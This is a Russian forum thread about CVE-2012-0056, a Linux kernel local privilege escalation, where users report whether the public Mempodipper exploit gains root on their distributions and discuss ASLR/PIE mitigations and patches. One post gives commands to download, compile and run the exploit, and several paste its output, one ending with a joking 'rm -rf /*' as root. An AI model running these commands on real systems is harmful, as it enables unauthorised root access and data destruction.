	Сообщение от Аноним (??) on 25-Янв-12, 02:05
	> Что за новая уязвимость? Пруф? http://www.openwall.com/lists/oss-security/2012/01/22/5 > А остальные чем принципиально лучше/хуже? У них дырки чтоли персональные? :) Нет, это у убунты персональные дырки. Потому что ее "разработчикам" лень проверять патчи, которые они применяют.
	Ответить | Правка | ^ к родителю #192 | Наверх | Cообщить модератору

	235. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 07-Фев-12, 16:33
	> Нет, это у убунты персональные дырки. Потому что ее "разработчикам" лень проверять > патчи, которые они применяют. А остальные как обрулили проблему озвученную в рассылке?
	Ответить | Правка | ^ к родителю #202 | Наверх | Cообщить модератору

	51. "В ядре Linux найдена локальная root-уязвимость"	+1 +/–
	Сообщение от filosofem (ok) on 23-Янв-12, 18:28
	>Неужели и в наш век в сети можно найти сервис где локальные учетки раздают? Не обязательно. На вэб-хостинг к примеру достаточно php-shell заалоадить.
	Ответить | Правка | ^ к родителю #43 | Наверх | Cообщить модератору

	63. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 23-Янв-12, 19:02
	Вариант вывалится из под контроля процесса под его привелегии я понимаю. Но спрашивал я именно про локальные учетки. Почему-то мне думается что уже повсюду контейнеры ..
	Ответить | Правка | ^ к родителю #51 | Наверх | Cообщить модератору

	69. "В ядре Linux найдена локальная root-уязвимость"	+1 +/–
	Сообщение от solardiz (ok) on 23-Янв-12, 19:13
	> Почему-то мне думается что уже повсюду контейнеры .. Shared hosting действительно у многих перемещается в контейнеры, но внутри них по-прежнему создаются сотни аккаунтов, в том числе с SSH-доступом. (Правда, у нас там нет ни одной доступной пользователю SUID root программы - контейнеры под shared hosting создаем на основе Owl.) Создавать по контейнеру на каждого клиента shared hosting'а непрактично.
	Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

	72. "В ядре Linux найдена локальная root-уязвимость"	–2 +/–
	Сообщение от Аноним (??) on 23-Янв-12, 19:19
	Далеко не все используют контейнеры для затыкания рутовых зеро-дэй, которые ожидаются by design. Равно как и далеко не все используют контейнеры для дозагрузки простаивающих многоядерников. Не у всех они простаивают и не всем нужно аргументированно дозагрузить камни и получить обоснование для покупки нового харда/откатов.
	Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

	82. "В ядре Linux найдена локальная root-уязвимость"	–1 +/–
	Сообщение от Michael Shigorin (ok) on 23-Янв-12, 20:20
	> Далеко не все ...и пусть их.
	Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

	161. "В ядре Linux найдена локальная root-уязвимость"	+2 +/–
	Сообщение от Аноним (??) on 24-Янв-12, 15:38
	> Равно как и далеко не все используют контейнеры для дозагрузки > простаивающих многоядерников. Не у всех они простаивают и не всем нужно > аргументированно дозагрузить камни и получить обоснование для покупки нового харда/откатов. Не знаю как у вас, а у нас в линуксе оверхед от контейнеров (lxc) практически нулевой. Процесс из контейнера отличается от процесса хоста только идентификаторами пространств имен.
	Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

	193. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 25-Янв-12, 01:12
	> Далеко не все используют контейнеры для затыкания рутовых зеро-дэй, которые ожидаются by > design. Равно как и далеко не все используют контейнеры для дозагрузки > простаивающих многоядерников. Нагрузка от LXC контейнеров практически по нулям (ну может пару процентов отличие, без микроскопа фиг заметишь). А разграничение довольно неплохое. Там и список процессов будет свой, и сетка и что там еще. И рут в LXC, если надо, может быть "фэйковым", лишенным прав везде кроме своего загончика. Так что если его даже и получат - не так уж и страшно. Telepath mode: а вы наверное бсдшник и хотели сказать "у нас этого нет, поэтому оно не нyжно".
	Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

	203. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от коксюзер on 25-Янв-12, 02:06
	> И рут в LXC, если надо, может быть "фэйковым", лишенным прав везде кроме На данный момент разве что при условии монтирования /proc в режиме ro. И не с помощью родных утилит LXC, которым требуется CAP_SYS_MOUNT внутри контейнера. > Telepath mode: а вы наверное бсдшник и хотели сказать "у нас этого > нет, поэтому оно не нyжно". Во FreeBSD давно есть jails.
	Ответить | Правка | ^ к родителю #193 | Наверх | Cообщить модератору

	211. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 25-Янв-12, 04:14
	> Нагрузка от LXC контейнеров практически по нулям (ну может пару процентов отличие, > без микроскопа фиг заметишь). А разграничение довольно неплохое. Там и список > процессов будет свой, и сетка и что там еще. И рут > в LXC, если надо, может быть "фэйковым", лишенным прав везде кроме > своего загончика. Так что если его даже и получат - не > так уж и страшно. О великий аноним, может ты дашь мне доступ к своему контейнеру на не обновленном ядре?
	Ответить | Правка | ^ к родителю #193 | Наверх | Cообщить модератору

	236. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 07-Фев-12, 16:35
	> Далеко не все используют контейнеры для затыкания рутовых зеро-дэй Тогда пусть не обижаются потом крутым руткитам и тому факту что их ресурсы использовали нашару.
	Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

45. "В ядре Linux найдена локальная root-уязвимость"	+2 +/–
Сообщение от Buy (??) on 23-Янв-12, 18:14
Ubuntu 11.10. Работает. ............. [+] Calculating su padding. [+] Seeking to offset 0x4021cc. [+] Executing su with shellcode. # # id uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),46(plugdev),115(lpadmin),117(admin),122(sambashare) # rm -rf /* :)))
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	54. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от anonymous (??) on 23-Янв-12, 18:41
	debian testing тоже работает
	Ответить | Правка | ^ к родителю #45 | Наверх | Cообщить модератору

	106. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 23-Янв-12, 23:33
	> # rm -rf /* > :))) --no-preserve-root забыли.
	Ответить | Правка | ^ к родителю #45 | Наверх | Cообщить модератору

	159. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 24-Янв-12, 15:34
	Со звездочкой - необязательно, preserve-root все равно не работает.
	Ответить | Правка | ^ к родителю #106 | Наверх | Cообщить модератору

50. "В ядре Linux найдена локальная root-уязвимость"	–5 +/–
Сообщение от ALex_hha (ok) on 23-Янв-12, 18:28
$ wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c $ gcc -o mempodipper mempodipper.c $ ./mempodipper =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/19890/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Reading su for exit@plt. [+] Resolved exit@plt to 0x1e70. [+] Calculating su padding. [+] Seeking to offset 0x1e62. [+] Executing su with shellcode. $ whoami test $ id uid=500(test) gid=501(test) groups=501(test) ЧЯДНТ? $ cat /etc/redhat-release CentOS release 6.2 (Final) $ uname -r 2.6.32-220.2.1.el6.x86_64
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	62. "В ядре Linux найдена локальная root-уязвимость"	–3 +/–
	Сообщение от XPEH on 23-Янв-12, 18:58
	> ЧЯДНТ? Читать не умеете: во всех ядрах 2.6.39 и выше
	Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

	71. "В ядре Linux найдена локальная root-уязвимость"	+1 +/–
	Сообщение от solardiz (ok) on 23-Янв-12, 19:18
	... и в RHEL 6 начиная с 2.6.32-220.el6, согласно Red Hat'у. Так что CentOS 6 с этой версией ядра должен быть уязвим. Но там могут быть другие отличия, ломающие конкретный эксплойт.
	Ответить | Правка | ^ к родителю #62 | Наверх | Cообщить модератору

	65. "В ядре Linux найдена локальная root-уязвимость"	+1 +/–
	Сообщение от solardiz (ok) on 23-Янв-12, 19:05
	Это немного странно, хотя не-работа конкретного эксплойта мало что значит. Если разбираться, я бы начал с проверки наличия mem_write с помощью вот этой тестовой программки: https://bugzilla.redhat.com/attachment.cgi?id=556461
	Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

	165. "В ядре Linux найдена локальная root-уязвимость"	+1 +/–
	Сообщение от solardiz (ok) on 24-Янв-12, 15:52
	Как многие уже догадались, на RHEL 6 и некоторых других системах, где опубликованные эксплойты как-бы не работают, дело в ASLR и PIE. Для успешной атаки потребуется другая SUID/SGID-программа (собранная не как PIE, но тоже выводящая что-то подходящее в stdout или stderr) или обход ASLR (много запусков) или выключенный ASLR. Ядро обновлять нужно - и как можно скорее. http://www.openwall.com/lists/oss-security/2012/01/24/2 "On Red Hat Enterprise Linux 6, /bin/su (coreutils) and /usr/bin/gpasswd (shadow-utils) are protected at compile time by PIE." https://access.redhat.com/kb/docs/DOC-69129 "2012-01-24: Article updated to reflect the release of the Red Hat Security Advisory RHSA-2012:0052, which fixes the CVE-2012-0056 flaw for Red Hat Enterprise Linux 6. The article was also updated to provide more information about generating a SystemTap kernel module for other computers, and to clarify that the publicly-circulated exploits do not affect Red Hat Enterprise Linux 6 and Red Hat Enterprise MRG at the time of writing."
	Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

55. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от ILYA INDIGO (ok) on 23-Янв-12, 18:43
ilya@ILYA:/tmp> uname -a Linux ILYA 3.2.1-3-desktop #1 SMP PREEMPT Fri Jan 13 10:38:45 UTC 2012 (2eca2bf) x86_64 x86_64 x86_64 GNU/Linux ilya@ILYA:/tmp> gcc ./a.c -o c ilya@ILYA:/tmp> ./c =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/30336/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Reading su for exit@plt. [+] Resolved exit@plt to 0x25e0. [+] Calculating su padding. [+] Seeking to offset 0x25be. [+] Executing su with shellcode. ilya@ILYA:/tmp> whoami ilya Это я что то не так делаю, или в openSUSE этого бага нету?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	61. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от ILYA INDIGO (ok) on 23-Янв-12, 18:57
	Таки в openSUSE этот эксплоит НЕ пашет :) Конечно при постоянном обновлении, хотя последний раз обновлялся 21-ого.
	Ответить | Правка | ^ к родителю #55 | Наверх | Cообщить модератору

	66. "В ядре Linux найдена локальная root-уязвимость"	+1 +/–
	Сообщение от solardiz (ok) on 23-Янв-12, 19:06
	> Таки в openSUSE этот эксплоит НЕ пашет :) ...что ничего не означает о наличии или отсутствии этой уязвимости. :-)
	Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

	80. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от ILYA INDIGO (ok) on 23-Янв-12, 20:04
	Я и не спорю, про уязвимость в целом, но констатирую отдельный факт.
	Ответить | Правка | ^ к родителю #66 | Наверх | Cообщить модератору

	108. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Sergey (??) on 23-Янв-12, 23:38
	Да, у меня тоже в OpenSuSe не пашет
	Ответить | Правка | ^ к родителю #55 | Наверх | Cообщить модератору

58. "В ядре Linux найдена локальная root-уязвимость"	+1 +/–
Сообщение от Аноним (??) on 23-Янв-12, 18:48
Debian wheezy/sid : работает. 3.2.0-1-amd64 #1 SMP Thu Jan 19 09:46:46 UTC 2012 x86_64 GNU/Linux $ ./mempodipper =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/13591/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Reading su for exit@plt. [+] Resolved exit@plt to 0x401fa8. [+] Calculating su padding. [+] Seeking to offset 0x401f9c. [+] Executing su with shellcode. # whoami root
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

64. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Аноним (??) on 23-Янв-12, 19:04
В Debian Squeeze обновленного из backports с ядром 2.6.39 норм запустился. А в OpenSuSE 12.1 с ядром 3.1 молча весь вывод пробегает, но su терминал не предоставляет... Печаль :-(
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	67. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 23-Янв-12, 19:08
	Вопрос походу отпал. Они 5 января уязвимость пофиксили вроде как. И хотя я еще не разу её не обновил, но скачал DVD и устанавливал около 15числа.
	Ответить | Правка | ^ к родителю #64 | Наверх | Cообщить модератору

68. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Аноним (??) on 23-Янв-12, 19:11
3.3-rc1 - не работает :) > ./a.out               =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/6675/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Reading su for exit@plt. [+] Resolved exit@plt to 0x401dd0. [+] Calculating su padding. [+] Seeking to offset 0x401dc2. [+] Executing su with shellcode. > whoami vizor
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	70. "В ядре Linux найдена локальная root-уязвимость"	–1 +/–
	Сообщение от имя on 23-Янв-12, 19:15
	web ? )
	Ответить | Правка | ^ к родителю #68 | Наверх | Cообщить модератору

78. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Аноним (??) on 23-Янв-12, 19:57
bash-4.1$ ./a.out =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/1864/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Reading su for exit@plt. [-] Could not resolve /bin/su. Specify the exit@plt function address manually. [-] Usage: ./a.out -o ADDRESS [-] Example: ./a.out -o 0x402178 bash-4.1$ su Password: bash-4.1# objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/' 0x8049648 bash-4.1# exit exit bash-4.1$ ./a.out -o 0x8049648 =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/1878/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Calculating su padding. [+] Seeking to offset 0x804963c. [+] Executing su with shellcode. bash-4.1$ whoami user bash-4.1$ uname -a Linux localhost 3.2.1-diamond-ironic #5 Wed Jan 18 16:07:15 GMT+3 2012 i686 Intel(R) Pentium(R) 4 CPU 2.40GHz GenuineIntel GNU/Linux Опять придется перезагружаться если Пароль забуду :(
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	81. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Денис (??) on 23-Янв-12, 20:07
	[user0@homelinux test]$ ./a.out =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/1816/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Reading su for exit@plt. [+] Resolved exit@plt to 0x80493d0. [+] Calculating su padding. [+] Seeking to offset 0x80493ae. [+] Executing su with shellcode. Ошибка сегментирования [user0@homelinux test]$ Linux homelinux 3.2.1-1-ARCH
	Ответить | Правка | ^ к родителю #78 | Наверх | Cообщить модератору

	194. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 25-Янв-12, 01:14
	> Ошибка сегментирования В арче даже сплойты работают с багами :)
	Ответить | Правка | ^ к родителю #81 | Наверх | Cообщить модератору

83. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Злыдень (??) on 23-Янв-12, 20:38
> Дополнение 3: Вышло обновление с устранением уязвимости для Ubuntu 11.10. Вот это скорость. В Fedora обновление в лучшем случае в среду вечером выйдет.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	127. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 24-Янв-12, 09:18
	В Арче тоже уже доступно.
	Ответить | Правка | ^ к родителю #83 | Наверх | Cообщить модератору

	162. "В ядре Linux найдена локальная root-уязвимость"	–1 +/–
	Сообщение от Аноним (??) on 24-Янв-12, 15:41
	> Вот это скорость. В Fedora обновление в лучшем случае в среду вечером выйдет. Но зато оно не будет содержать новую уязвимость, в отличие от :)
	Ответить | Правка | ^ к родителю #83 | Наверх | Cообщить модератору

	195. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 25-Янв-12, 01:15
	> Но зато оно не будет содержать новую уязвимость, в отличие от :) Что за новая уязвимость? Откуда дровишки?
	Ответить | Правка | ^ к родителю #162 | Наверх | Cообщить модератору

86. "В ядре Linux найдена локальная root-уязвимость"	+2 +/–
Сообщение от meequz (ok) on 23-Янв-12, 20:53
В Mandriva 2011 не работает. Ни 38 ядром, ни с 39.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

93. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Аноним (??) on 23-Янв-12, 21:47
Странно: glsa-check -t all This system is not affected by any of the listed GLSAs uname -r 3.2.1-gentoo
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	118. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от I am (??) on 24-Янв-12, 02:31
	> Странно: > glsa-check -t all > This system is not affected by any of the listed GLSAs > uname -r > 3.2.1-gentoo На ядра GLSA не публикуют.
	Ответить | Правка | ^ к родителю #93 | Наверх | Cообщить модератору

94. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Аноним (??) on 23-Янв-12, 21:54
Linux da_desktop 3.1.9-1.fc16.i686.PAE #1 SMP Fri Jan 13 16:57:54 UTC 2012 i686 i686 i386 GNU/Linux {den@da_desktop}-> ~ $gcc -o rk rk.c {den@da_desktop}-> ~ $./rk =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/4470/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Reading su for exit@plt. [+] Resolved exit@plt to 0x1524. [+] Calculating su padding. [+] Seeking to offset 0x1516. [+] Executing su with shellcode. {den@da_desktop}-> ~ $whoami den Не работает.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

98. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Аноним (??) on 23-Янв-12, 22:47
в aptosid ещё 20 числа выпустили апдейт
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

100. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Аноним (??) on 23-Янв-12, 22:58
RHEL 6.1 - не работает
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

101. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от dAverk (??) on 23-Янв-12, 23:06
Трижды попробовал. ЧЯДНТ? :( [dAverk@dAverk ~]$ ./mempodipper =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/7121/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Reading su for exit@plt. [+] Resolved exit@plt to 0x21a8. [+] Calculating su padding. [+] Seeking to offset 0x2186. [+] Executing su with shellcode. [dAverk@dAverk ~]$ whoami dAverk [dAverk@dAverk ~]$ uname -a Linux dAverk.4820TG 3.1.7-1.fc16.x86_64 #1 SMP Tue Jan 3 19:45:05 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux [dAverk@dAverk ~]$ cat /etc/redhat-release RFRemix release 16 (Verne) [dAverk@dAverk ~]$ id uid=1000(dAverk) gid=1000(dAverk) группы=1000(dAverk)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	102. "В ядре Linux найдена локальная root-уязвимость"	+1 +/–
	Сообщение от dAverk (??) on 23-Янв-12, 23:08
	Ща ещё обновимся до 3.1.9 и заодно на 6м центе и дебах 5/6 посмотрим-с
	Ответить | Правка | ^ к родителю #101 | Наверх | Cообщить модератору

	104. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от dAverk (??) on 23-Янв-12, 23:25
	> Ща ещё обновимся до 3.1.9 и заодно на 6м центе и дебах > 5/6 посмотрим-с на 3.1.9 тоже не завелось [dAverk@dAverk ~]$ ./mempodipper =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/4219/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Reading su for exit@plt. [+] Resolved exit@plt to 0x21a8. [+] Calculating su padding. [+] Seeking to offset 0x2186. [+] Executing su with shellcode. [dAverk@dAverk ~]$ id uid=1000(dAverk) gid=1000(dAverk) группы=1000(dAverk) [dAverk@dAverk ~]$ whoami dAverk [dAverk@dAverk ~]$ cat /etc/redhat-release RFRemix release 16 (Verne) [dAverk@dAverk ~]$ uname -a Linux dAverk.4820TG 3.1.9-1.fc16.x86_64 #1 SMP Fri Jan 13 16:37:42 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
	Ответить | Правка | ^ к родителю #102 | Наверх | Cообщить модератору

	109. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от dAverk (??) on 23-Янв-12, 23:46
	на 5м дебе старое ядро, на 6м работает. На 6й центе даже gcc отродясь не было, но ради такого я даже поставил, но нихчего [admin@samba ~]$ ./mempodipper =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/9249/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Reading su for exit@plt. [+] Resolved exit@plt to 0x1e70. [+] Calculating su padding. [+] Seeking to offset 0x1e4e. [+] Executing su with shellcode. [admin@samba ~]$ id uid=506(admin) gid=506(admin) группы=506(admin) [admin@samba ~]$ whoami admin [admin@samba ~]$ cat /etc/redhat-release CentOS release 6.2 (Final) [admin@samba ~]$ uname -a Linux samba.unesko 2.6.32-131.17.1.el6.x86_64 #1 SMP Thu Oct 6 19:24:09 BST 2011 x86_64 x86_64 x86_64 GNU/Linux кстати в какой репе 2.6.32-220 ядро? у меня не находит обновления :(
	Ответить | Правка | ^ к родителю #102 | Наверх | Cообщить модератору

	134. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от dAverk (??) on 24-Янв-12, 10:11
	на 2.6.32-220 Centos 6 Не заработало [admin@samba ~]$ uname -a Linux samba.unesko 2.6.32-220.2.1.el6.x86_64 #1 SMP Fri Dec 23 02:21:33 CST 2011 x86_64 x86_64 x86_64 GNU/Linux
	Ответить | Правка | ^ к родителю #109 | Наверх | Cообщить модератору

	148. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 24-Янв-12, 12:42
	> на 5м дебе старое ядро, на 6м работает. Ты что-то попутал. В squeeze 2.6.32
	Ответить | Правка | ^ к родителю #109 | Наверх | Cообщить модератору

	158. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от dAverk (??) on 24-Янв-12, 15:23
	>> на 5м дебе старое ядро, на 6м работает. > Ты что-то попутал. В squeeze 2.6.32 Каюсь - чёрт меня попутал. На тестовой машине смотрел, а у меня там из wheezy ядрышко :)
	Ответить | Правка | ^ к родителю #148 | Наверх | Cообщить модератору

107. "В ядре Linux найдена локальная root-уязвимость"	+1 +/–
Сообщение от Гентушник (ok) on 23-Янв-12, 23:34
На Gentoo 3.1.5-hardened x86_64 не работает. Даже chmod a+r /bin/su не помогает. Вот так всегда :(
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	110. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Гентушник (ok) on 23-Янв-12, 23:54
	test@naodesu ~/CVE-2012-0056 $ ./mempodipper =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/31729/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Reading su for exit@plt. [+] Resolved exit@plt to 0x2a90. [+] Calculating su padding. [+] Seeking to offset 0x2a84. [+] Executing su with shellcode. test@naodesu ~/CVE-2012-0056 $ id uid=1003(test) gid=1003(test) groups=1003(test) test@naodesu ~/CVE-2012-0056 $ cat /etc/shadow cat: /etc/shadow: Permission denied
	Ответить | Правка | ^ к родителю #107 | Наверх | Cообщить модератору

113. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от arisu (ok) on 23-Янв-12, 23:59
хм. uname -a Linux 3.1.5 #2 SMP Sat Dec 10 22:58:40 EET 2011 i686 Intel(R) Core(TM)2 Duo CPU     E8400  @ 3.00GHz GenuineIntel GNU/Linux ./mempodipper =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/10462/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Reading su for exit@plt. [-] Could not resolve /bin/su. Specify the exit@plt function address manually. [-] Usage: ./mempodipper -o ADDRESS [-] Example: ./mempodipper -o 0x402178 не работает. %-(
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	115. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от arisu (ok) on 24-Янв-12, 00:04
	после objdump и указания адреса — тоже. пичалька.
	Ответить | Правка | ^ к родителю #113 | Наверх | Cообщить модератору

124. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от reinhard (ok) on 24-Янв-12, 07:20
bash-4.2$ uname -a Linux spring.bit.ab.ru 2.6.41.1-1.fc15.i686 #1 SMP Fri Nov 11 21:50:36 UTC 2011 i686 i686 i386 GNU/Linux bash-4.2$ ./a.out =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/2478/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Reading su for exit@plt. [+] Resolved exit@plt to 0x1734. [+] Calculating su padding. [+] Seeking to offset 0x1726. [+] Executing su with shellcode. bash-4.2$ id uid=99(nobody) gid=99(nobody) groups=99(nobody)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

125. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Флинт on 24-Янв-12, 07:39
[alexander@localhost ~]$ ./mempodipper =============================== =          Mempodipper        = =           by zx2c4          = =         Jan 21, 2012        = =============================== [+] Opening socketpair. [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc/5212/mem in child. [+] Sending fd 5 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Reading su for exit@plt. [+] Resolved exit@plt to 0x1984. [+] Calculating su padding. [+] Seeking to offset 0x1962. [+] Executing su with shellcode. [alexander@localhost ~]$ whoami alexander [alexander@localhost ~]$ uname -r 2.6.39.4-5.1-desktop [alexander@localhost ~]$ ROSA 2011 не работает! :)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

126. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от CHERTS (??) on 24-Янв-12, 08:19
На Ubuntu 11.10 x86 с ядром 3.0.0 эксплоит работает
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	153. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 24-Янв-12, 13:41
	> На Ubuntu 11.10 x86 с ядром 3.0.0 эксплоит работает так уже апдейт вышел
	Ответить | Правка | ^ к родителю #126 | Наверх | Cообщить модератору

	163. "В ядре Linux найдена локальная root-уязвимость"	+/–
	Сообщение от Аноним (??) on 24-Янв-12, 15:49
	> так уже апдейт вышел ... с новой дырой в комплекте :)
	Ответить | Правка | ^ к родителю #153 | Наверх | Cообщить модератору

128. "В ядре Linux найдена локальная root-уязвимость"	+/–
Сообщение от Ващенаглухо (ok) on 24-Янв-12, 09:26
